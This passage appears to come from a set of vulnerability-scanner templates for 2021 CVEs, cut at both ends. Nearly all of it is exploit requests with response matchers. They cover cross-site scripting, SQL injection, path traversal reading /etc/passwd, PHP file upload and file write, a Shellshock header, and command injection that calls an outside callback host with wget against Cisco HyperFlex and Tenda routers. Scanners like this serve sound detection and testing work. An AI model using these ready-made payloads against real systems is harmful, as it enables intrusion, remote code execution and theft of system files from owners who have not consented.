application/json\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36\nContent-Length: 76\n\n{\"id\":1,\"jsonrpc\":\"2.0\",\"params\":{\"token\":  \"Test\"},\"method\":\"web.LoginSTS\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["We encountered an internal error"]}]}]},{"id":"CVE-2021-21803","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42567","info":{"name":"Apereo CAS Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cas/v1/tickets/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img/src/onerror=alert(document.domain)>","java.util.HashMap"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-39322","info":{"name":"WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24284","info":{"name":"WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------d3be34324392a708\n\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fonticonzipfile\"; filename=\"{{zip_file}}.zip\"\nContent-Type: application/octet-stream\n\n{{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fontsetname\"\n\n{{zip_file}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"action\"\n\nuploadFontIcon\n--------------------------d3be34324392a708--\n","GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css"]},{"type":"word","part":"body_2","words":["phpinfo()"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1498","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /storfs-asup HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28419","info":{"name":"SEO Panel 4.8.0 - Blind SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: _csrf={{rand_base(54,\"abc\")}};\n","POST /login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}login.php\nCookie: _csrf={{rand_base(54,\"abc\")}};\n\nsec=login&red_referer=http%3A%2F%2F{{BaseURL}}&userName={{username}}&password={{password}}&login=\n","GET /archive.php?from_time=2021-04-25&order_col=(SELECT+7397+FROM(SELECT(SLEEP(3)))test)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id= HTTP/1.1\nHost: {{Hostname}}\nCookie: _csrf={{rand_base(54,\"abc\")}};\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_3>=6","status_code_3 == 200","contains(body_3, \"Overall Report Summary\")"],"condition":"and"}]}]},{"id":"CVE-2021-41277","info":{"name":"Metabase Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/geojson?url=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30213","info":{"name":"Knowage Suite 7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24276","info":{"name":"WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42667","info":{"name":"Online Event Booking and Reservation System 2.3.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42551","info":{"name":"NetBiblio WebOPAC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x","{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SearchTerm: 'x'+alert(1)+'x',","SearchTerm: 'x\\\\'+alert(1),//',"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["NetBiblio"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42627","info":{"name":"D-Link DIR-615 - Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wan.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["src='menu.js?v=\"+Math.random()+\"'></scr\"+\"ipt>\");","var ipv6conntype"],"condition":"and"},{"type":"word","part":"header","words":["Virtual Web"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35587","info":{"name":"Oracle Access Manager - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/oam/server/opensso/sessionservice"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["x-oracle-dms-ecid","x-oracle-dms-rid"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"body","words":["/oam/pages/css/general.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37833","info":{"name":"Hotel Druid 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1","{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1","{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1","{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26812","info":{"name":"Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(document.domain);"]},{"type":"word","part":"header","words":["MoodleSession"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25028","info":{"name":"WordPress Event Tickets < 5.2.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-45232","info":{"name":"Apache APISIX Dashboard <2.10.1 - API Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{RootURL}}/apisix/admin/migrate/export"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Consumers\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27132","info":{"name":"Sercomm VD625 Smart Modems - CRLF Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Disposition: attachment;filename=test.txt","Set-Cookie:CRLFInjection=Test","Location: interact.sh","X-XSS-Protection:0"],"condition":"and"},{"type":"status","part":"header","status":[404]}]}]},{"id":"CVE-2021-32618","info":{"name":"Python Flask-Security - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=\\\\\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-26475","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</title><script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35336","info":{"name":"Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get_device_details"],"headers":{"Authorization":"Digest username=\"admin\", realm=\"Bridge-IT\", nonce=\"d24d09512ebc3e43c4f6faf34fdb8c76\", uri=\"/api/get_device_details\", response=\"d052e9299debc7bd9cb8adef0a83fed4\", qop=auth, nc=00000001, cnonce=\"ae373d748855243d\"","Referer":"{{BaseURL}}/assets/base/home.html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<SERIAL>","<VERSION>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44515","info":{"name":"Zoho ManageEngine Desktop Central - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /STATE_ID/123/agentLogUploader HTTP/1.1\nHost: {{Hostname}}\nCookie: STATE_COOKIE=&_REQS/_TIME/123\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 0"]},{"type":"word","part":"header","words":["UEMJSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24342","info":{"name":"WordPress JNews Theme <8.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /?ajax-request=jnews HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nlang=en_US&cat_id=6\"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41282","info":{"name":"pfSense - Arbitrary File Write","severity":"high"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=\n","GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\\x3c\\x3fphp+var_dump(md5(\\x27CVE-2021-41282\\x27));unlink(__FILE__)\\x3b\\x3f\\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1\nHost: {{Hostname}}\n","GET /test.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(body, 'c3959e8a43f1b39b0d1255961685a238')","status_code==200"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["(sid:[a-z0-9,;:]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25111","info":{"name":"WordPress English Admin <1.5.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-28918","info":{"name":"Netmask NPM Package - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://0177.0.0.1/server-status","{{BaseURL}}/?host=http://0177.0.0.1/server-status","{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Apache Server Status","Server Version"],"condition":"and"},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-38704","info":{"name":"ClinicCases 7.3.3 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42013","info":{"name":"Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n\n"],"stop-at-first-match":true,"unsafe":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-42013"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-21978","info":{"name":"VMware View Planner <4.6 SP1- Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"logfile\"; filename=\"\"\nContent-Type: text/plain\n\nPOC_TEST\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 28"]},{"type":"word","part":"body","words":["File uploaded successfully."]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31755","info":{"name":"Tenda Router AC11 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /goform/setmac HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/index.htmlr\nContent-Type: application/x-www-form-urlencoded\n\nmodule1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-31602","info":{"name":"Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js","{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<roleList>","<roles>Anonymous</roles>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44529","info":{"name":"Ivanti EPM Cloud Services Appliance Code Injection","severity":"critical"},"requests":[{"raw":["GET /client/index.php HTTP/1.1\nHost: {{Hostname}}\nCookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["phpinfo()","Cloud Services Appliance"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24956","info":{"name":"Blog2Social < 6.8.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&b2sShowByDate=\"><script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" name=","Your Activity"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21802","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42071","info":{"name":"Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/slogin/login.py HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20091","info":{"name":"Buffalo WSR-2533DHPL2 - Configuration File Injection","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","POST /images/..%2fapply_abstract.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n\naction=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/Success.htm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-31537","info":{"name":"SIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>confirm({{randstr}})</script>","SIS-REWE"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-46381","info":{"name":"D-Link DAP-1620 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/apply.cgi"],"body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-26085","info":{"name":"Atlassian Confluence Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<display-name>Confluence</display-name>","com.atlassian.confluence.setup.ConfluenceAppConfig"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45968","info":{"name":"Pascom CPS  - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /services/pluginscript/ HTTP/1.1\nHost: {{Hostname}}\n","GET /services/pluginscript/..;/..;/ HTTP/1.1\nHost: {{Hostname}}\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_2 != status_code_1","contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')"],"condition":"and"}]}]},{"id":"CVE-2021-24435","info":{"name":"WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["(?i)(onerror=|onclick=)['\"]?alert\\(document\\.domain\\)['\"]?","<p>Grumpy wizards make"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28937","info":{"name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.html"],"matchers-condition":"and","matchers":[{"type":"word","words":["Password Setting","addCfg('username'","addCfg('newpass'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25085","info":{"name":"WOOF WordPress plugin - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"additional_fields\":[\"<img src=x onerror=alert(document.domain)>\"]}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24364","info":{"name":"WordPress Jannah Theme <5.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24910","info":{"name":"WordPress Transposh Translation <1.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","{\"result\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24407","info":{"name":"WordPress Jannah Theme <5.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=tie_ajax_search&query[]=</script><script>alert(document.domain)</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20150","info":{"name":"Trendnet AC2600 TEW-827DRU - 